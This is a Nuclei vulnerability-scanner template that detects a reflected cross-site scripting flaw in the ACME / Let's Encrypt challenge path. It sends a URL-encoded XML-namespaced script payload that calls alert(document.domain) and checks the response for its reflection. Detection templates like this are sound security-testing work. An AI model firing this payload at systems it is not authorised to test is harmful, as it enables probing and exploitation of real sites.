nuclei-templates/vulnerabilities/other/acme-xss.yaml

23 lines
624 B
YAML

id: acme-xss
info:
name: ACME / Let's Encrypt Reflected XSS
author: pdteam
severity: medium
tags: xss,acme
requests:
- method: GET
path:
- '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain&#x29;</x:script>"
- type: word
words:
- "/xml"
- "/html"